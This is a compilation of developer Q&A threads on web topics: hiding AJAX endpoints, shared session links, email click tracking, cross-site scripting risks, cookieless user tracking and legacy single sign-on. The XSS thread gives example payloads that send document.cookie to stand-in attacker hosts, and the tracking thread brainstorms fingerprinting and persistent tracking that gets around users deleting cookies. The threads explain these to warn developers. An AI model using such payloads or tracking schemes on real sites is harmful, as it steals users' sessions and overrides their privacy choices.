I am using ajax in my website and in order to use the ajax, I habe to write the name of the file for example:
id = "123";
$.getJSON(jquerygetevent.php?id=" + id, function(json)
{
//do something
});
how can I protect the url? I dont want people to see it and use it...
that is a limitation of using client side scripts. there is no real way to obfuscate it from the user there are many ways to make it less readable (minify etc) but in the end an end-user can still view the code
Hi Ron and welcome to the internet. The internet was (to quote Wikipedia on the subject)
The origins of the Internet reach back to research of the 1960s, commissioned by the United States government in collaboration with private commercial interests to build robust, fault-tolerant, and distributed computer networks. The funding of a new U.S. backbone by the National Science Foundation in the 1980s, as well as private funding for other commercial backbones, led to worldwide participation in the development of new networking technologies, and the merger of many networks. The commercialization of what was by the 1990s an international network resulted in its popularization and incorporation into virtually every aspect of modern human life.
Because of these origins, and because of the way that the protocols surrounding HTTP resource identification (like for URLs) there's not really any way to prevent this. Had the internet been developed as a commercial venture initially (think AOL) then they might have been able to get away with preventing the browser from showing the new URL to the user.
So long as people can "view source" they can see the URLs in the page that you're referring them to visit. The best you can do is to obfuscate the links using javascript, but at best that's merely an annoyance. What can be decoded for the user can be decoded for a bot.
Welcome to the internet, may your stay be a long one!
I think the underlying issue is why you want to hide the URL. As everyone has noted, there is no way to solve the actual resolved URL. Once it is triggered, FireBug gives you everything you need to know.
However, is the purpose to prevent a user from re-using the URL? Perhaps you can generate one-time, session-relative URLs that can only be used in the given HTTP Session. If you cut/paste this URL to someone else, they would be unable to use it. You could also set it to expire if they tried to Refresh. This is done all the time.
Is the purpose to prevent the user from hacking your URL by providing a different query parameter? Well, you should be handling that on the server side anyways, checking if the user is authorized. Even before activating the link, the user can use a tool like FireBug to edit your client side code as much as they want. I've done this several times to live sites when they're not functioning the way I want :)
UPDATE: A HORRIBLE hack would be to drop an invisible Java Applet on the page. They can also trigger requests and interact with Javascript. Any logic could be included in the Applet code, which would be invisible to the user. This, however, introduces additional browser compatibility issues, etc, but can be done. I'm not sure if this would show up in Firebug. A user could still monitor outgoing traffic, but it might be less obvious. It would be better to make your server side more robust.
Why not put some form of security on your php script instead, check a session variable or something like that?
EDIT is response to comment:
I think you've maybe got the cart before the horse somehow. URLs are by nature public addresses for resources. If the resource shouldn't be publicly consumable except in specific instances (i.e. from within your page) then it's a question of defining and implementing security for the resource. In your case, if you only want the resource called once, then why not place a single use access key into the calling page? Then the resource will only be delivered when the page is refreshed. I'm unsure as to why you'd want to do this though, does the resource expose sensitive information? Is it perhaps very heavy on the server to run the script? And if the resource should only be used to render the page once, rather than update it once it's rendered, would it perhaps be better to implement it serverside?
you can protect (hide) anything on client, just encrypt/encode it into complicated format to real human
Related
Okay, this may sound like a stupid question, but this actually is a real life situation I gotta sort out.
The company I work for is using a rather outdated online shop software (PHP) which is hosted on the companys server. Unfortunately, the source code is encrypted and the CMS does not allow me to add some PHP code either, so I guess I'm stuck with JavaScript on this one.
Let's say we have a huge sale start coming up and people start sharing links via YouTube, Twitter, and so on. Due to the software being made somewhere in the last century, some links still contain session IDs which will definitely be shared by some users. This, however, will result in multiple users placing orders on the same customer account or even worse, overwriting existing customer accounts with new customer data.
I know that this situation is far from ideal and that the software definitely needs and update, but this is not an option at the moment. I also know that I'm not getting a 100% solution, so I'm just gonna try to prevent people from accidentally wrecking some customer data.
That being sad, I though about checking the URL for a Session ID and checking the value in document.referrer aswell. If the URL contains a Session ID and the referrer is some other server than ours, I'll just do a quick redirect to the main landing page. Again: This is meant to prevent the average user from accidentally logging into someone elses account due to clicking on a bad link, I'm not trying to prevent proper session hijacking here.
Any ideas on this one? Are there any situations where the referrer might not contain actual values, e. g. the browser not sending referrers at all? Any other ways to sort this out using JavaScript only?
This may be a bit of a tricky one (for me at least, but you guys may be smarter). I need to capture the timestamp of exactly when a reader clicks a link in an email. However, this link is not a hyperlink to another webpage. It is a link formatted as a GET request with querystrings that will automatically submit a form.
Here is the tricky part....The form processing is not handled by PHP or .NET or any other server side language. It is a form engine that is hosted and managed by a cloud based marketing platform that captures and displays the form submission data (So i have no access to the code behind the scenes).
Now, if this wasn't an email I'd say it is simple enough to just use Javascript. However, javascript doesn't work so well with email, if at all (I'm just assuming there are some email clients out there that support javascript).
How would you go about capturing the timestamp for when the link is clicked without using any type of scripting? Is this even possible?
The best solution i could come up with was to have the link point to an intermediate page with javascript to capture timestamp and then redirect to the form submission. Only problem with that is that it will only capture timestamp of page load and not of the actual click activity.
There is no way to do what you want "without any type of scripting". If no scripting is done, no functionality may be added or changed.
The best option is the very one you suggested: use an intermediary page that records the request time. Barring unusual circumstances (such as a downed server), the time between a link being clicked and the request reaching the server will be less than 1 second.
Do you really need a higher resolution or accuracy than ~1s? What additional gain is there from having results on the order of milliseconds or microseconds? I can't imagine a scenario in which you'd have tangible benefits from such a thing, though if you do have one I'd love to hear it.
My initial thought was to say that what you're trying to do can't be done without some scripting capability, but I suppose it truly depends on what you're trying to accomplish overall.
While there is ambiguity in what you're trying to accomplish from what you have written, I'm going to make an assumption: you're trying to record interaction with a particular email.
Depending on the desired resolution, this is very possible--in fact--something that most businesses have been doing for years.
To begin my explanation of the technique, consider this common functionality in most mail clients (web-based or otherwise):
Click here to display images below
The reason for this existing is that the images that are loaded into the message that you're reading often come from a remote server not hosted by the mail client. In the process of requesting that image, a great deal of information about yourself is given to that outside server via HTTP headers in your request including, among other things, a timestamp for the request. Thus the above button is used to prevent that from happening without your consent.
That said, its also important to note how other mail client providers, most notably gmail, are approaching this now. The aforementioned technique is so common (used by advertisers and by other, more nefarious parties for the purpose of phishing, malware, etc) that Google has decided to start caching all mail images themselves. The result is that the email looks exactly the same, but all requests for images are instead directed at Google's cached versions.
Long story short, you can get a timestamp to note interaction with an email via image request, but such metric collection in general, regardless if its done in the manner I've outlined, is something mail clients try to prevent, at least at some level.
EDIT - To relate this back to what you mention in your question and your idea of having some intermediary page, you could skip having that page and instead you would point an image request towards a server you control
I just happen to read the joel's blog here...
So for example if you have a web page that says “What is your name?” with an edit box and then submitting that page takes you to another page that says, Hello, Elmer! (assuming the user’s name is Elmer), well, that’s a security vulnerability, because the user could type in all kinds of weird HTML and JavaScript instead of “Elmer” and their weird JavaScript could do narsty things, and now those narsty things appear to come from you, so for example they can read cookies that you put there and forward them on to Dr. Evil’s evil site.
Since javascript runs on client end. All it can access or do is only on the client end.
It can read informations stored in hidden fields and change them.
It can read, write or manipulate cookies...
But I feel, these informations are anyway available to him. (if he is smart enough to pass javascript in a textbox. So we are not empowering him with new information or providing him undue access to our server...
Just curious to know whether I miss something. Can you list the things that a malicious user can do with this security hole.
Edit : Thanks to all for enlightening . As kizzx2 pointed out in one of the comments... I was overlooking the fact that a JavaScript written by User A may get executed in the browser of User B under numerous circumstances, in which case it becomes a great risk.
Cross Site Scripting is a really big issue with javascript injection
It can read, write or manipulate cookies
That's the crucial part. You can steal cookies like this: simply write a script which reads the cookie, and send it to some evil domain using AJAX (with JSONP to overcome the cross domain issues, I think you don't even need to bother with ajax, a simple <img src="http://evil.com/?cookieValue=123"> would suffice) and email yourself the authentication cookie of the poor guy.
I think what Joel is referring to in his article is that the scenario he describes is one which is highly vulnerable to Script Injection attacks, two of the most well known of which are Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF).
Since most web sites use cookies as part of their authentication/session management solution, if a malicious user is able to inject malicious script into the page markup that is served to other users, that malicious user can do a whole host of things to the detriment of the other users, such as steal cookies, make transactions on their behalf, replace all of your served content with their own, create forms that imitate your own and post data to their site, etc, etc.
There are answers that explain CSRF and XSS. I'm the one to say that for the particular quoted passage, there is no security threat at all.
That quoted passage is simple enough -- it allows you to execute some JavaScript. Congratulations -- I can do the same with Firebug, which gives me a command line to play with instead of having to fake it using a text box that some Web site gives me and I have to abuse it.
I really think Joel wasn't really sober when writing that. The example was just plain misleading.
Edit some more elaborations:
We should keep several things in mind:
Code cannot do any harm unless executed.
JavaScript can only be executed on client side (Yes there are server-side JavaScript, but apparently not in the context of this question/article)
If the user writes some JavaScript, which then gets executed on his own machine -- where's the harm? There is none, because he can execute JavaScript from Firebug anytime he wants without going through a text box.
Of course there are CSRF, which other people have already explained. The only case where there is a threat is where User A can write some code which gets executed in User B's machine.
Almost all answers that directly answer the question "What harm can JavaScript do?" explain in the direction of CSRF -- which requires User A being able to write code that User B can execute.
So here's a more complete, two part answer:
If we're talking about the quoted passage, the answer is "no harm"
I do not interpret the passage's meaning to mean something like the scenario described above, since it's very obviously talking about a basic "Hello, Elmer world" example. To synthetically induce implicit meanings out of the passage just makes it more misleading.
If we're talking about "What harm can JavaScript do, in general," the answer is related to basic XSS/CSRF
Bonus Here are a couple of more real-life scenarios of how an CSRF (User A writes JavaScript that gets exected on User B's machine) can take place
A Web page takes parameters from GET. An attacker can lure a victim to visit http://foo.com/?send_password_to=malicious.attacker.com
A Web page displays one user's generated content verbatim to other users. An attacker could put something likm this in his Avatar's URL: <script>send_your_secret_cookies_to('http://evil.com')</script> (this needs some tweaking to get pass quoting and etc., but you get the idea)
Cause your browser to sent requests to other services using your authentication details and then send the results back to the attacker.
Show a big picture of a penis instead of your company logo.
Send any personal info or login cookies to a server without your consent.
I would look the wikipedia article on javascript security. It covers a number of vulnerabilities.
If you display data on your page that comes from a user without sanitizing that data first, it's a huge security vulnerability, and here's why:
Imagine that instead of "Hello, Elmer!", that user entered
<script src="http://a-script-from-another-site.js" type="text/javascript"></script>
and you're just displaying that information on a page somewhere without sanitizing it. That user can now do anything he wants to your page without other users coming to that page being aware. They could read the other users' cookie information and send it anywhere they want, they could change your CSS and hide everything on your page and display their own content, they could replace your login form with their own that sends information to any place they wish, etc. The real danger is when other users come to your site after that user. No, they can't do anything directly to your server with JavaScript that they couldn't do anyway, but what they can do is get access to information from other people that visit your site.
If you're saving that information to a database and displaying it, all users who visit that site will be served that content. If it's just content that's coming from a form that isn't actually saved anywhere (submitting a form and you're getting the data from a GET or POST request) then the user could maliciously craft a URL (oursite.com/whatsyourname.php?username=Elmer but instead of Elmer, you put in your JavaScript) to your site that contained JavaScript and trick another user into visiting that link.
For an example with saving information in a database: let's say you have a forum that has a log in form on the front page along with lists of posts and their user names (which you aren't sanitizing). Instead of an actual user name, someone signs up with their user name being a <script> tag. Now they can do anything on your front page that JavaScript will accomplish, and every user that visits your site will be served that bit of JavaScript.
Little example shown to me a while ago during XSS class..
Suppose Elmer is amateur hacker. Instead of writing his name in the box, he types this:
<script>$.ajax("http://elmer.com/save.php?cookie=" + document.cookie);</script>
Now if the server keeps a log of the values written by users and some admin is logging in and viewing those values..... Elmer will get the cookie of that administrator!
Let's say a user would read your sourcecode and make his own tweak of for instance an ajax-call posting unwanted data to your server. Some developers are good at protecting direct userinput, but might not be as careful protecting database calls made from a ajax-call where the dev thinks he has control of all the data that is being sent trough the call.
ok... im looking to have a good round of brainstorming here...
say i was google... the adword/adsense/analytics division. i would be getting a little worried about the future, when users start to disable cookies (or at least delete them on a regular basis), use private browsing, roam on multiple devices. how could google alternatively track users without the benefits of cookies?
some ideas to get started (please elaborate on these and any others):
-track users using some other persistent local/client side storage
-use user-agent string fingerprinting
-test cache response - if user 304's an image, they were here
-track mac address
-any random/out of the box ideas?
Take a look at http://samy.pl/evercookie/, it's a JS API for ultra-persistent cookies, but you can take idea(s) from it's mechanism to find storage for your data.
I think you could do it using custom urls. You would basically ecrypt a cookie and attach it as part of the URL you send to the browser. When it returns, your web server would be smart enough to decode it and track whoever sent it.
I believe the Spring framework can do this in fact.
If your site requires user tracking, then I would have it fail to work if cookies are disabled. Then focus your time and effort on making it a fantastic site for the vast majority of your visitors, and don't worry about the ones who, for whatever reason, have made the explicit decision to disable cookies.
(Made this a CW answer because this is a subjective question that's likely to be closed.)
Information about browser/system/display through js and IP of cause;
Java Applet provide a lot of info about user;
Flash also (e.g. installed fonts);
Modern browsers also provide a lot of information about users (e.g. installed extensions) and provide new ways to save information on client-side (e.g. html5 storage).
altogether: http://panopticlick.eff.org/
you can always resort back to good ol way, the HIT COUNTER.
on page, use tag and link to external image on your server
on your server, when image is fetched, redirect it to php script through .htaccess and record header info about device id etc. {similar code as disabling the hotlinking of image}
Now you have all info, use php_session() to keep a track of it
you can always use js for the same purpose, but using tag will ensure that js is not required and the script will run on all browsers
Okay, this just feels plain nasty, but I've been directed to do it, and just wanted to run it past some people who actually have a clue, so they can point out all the massive holes in it.....so here goes.....
We've got this legacy site & a new public beta-test one. Apparently it's super cereal that moving from one to the other is seamless, so in a manner of speaking, we need a single signon solution.
As we're not allowed to put any serious development into the legacy site (It's also in old school ASP, a language I don't care to learn.) I can't do a proper single sign-on solution, so I proposed the following: On login, the legacy site performs an AJAX post to the login controller of the new beta site, logging the user in there, it then simply proceeds with the login on the legacy site as normal. This may not be acceptable as there's code to prevent a user from being logged on twice, I'm not sure if it's been written to apply across sites.
The other idea I had was to pass a salted hash of the user's details across with their username when they try to access the 2nd site. If the hash matches the details of the user, then access is granted. This would need ASP development obviously as generating the hash on the client side would only serve to enhance the idiocy even further.
Does anyone have any thoughts?
The old ASP site must have some concept of a session if it requires a logon. You will, at a minimum, need to understand how to provide the session information to the legacy site and splice some code in to keep it copacetic if both sites need to be kept up indefinitely.
"Classic" ASP isn't so bad if you can read/write VB6, VBA, VBScript or VB.net. It probably won't be difficult to graft session initialization provided the code is half way decent.
Consider creating a common logon page for both sites + either an automatic redirect based on either the requested URL (I'm guessing the old and new sites have distinct URLs) or cookies passed with the request (the old site, if it used cookies, could identify a legacy user). This common logon page could initialize session on both the legacy site (only if required by user type) and on the new site. This will allow you to keep your new logon process unencumbered by the legacy process while maintaining the old as long as required.
Bear in mind that your first approach (AJAX request from one site to the other) won't work if the sites are on different domains, because of javascript security restrictions.
You might be able to work around this by using a hidden iframe for the post like this, but it's getting a little hacky.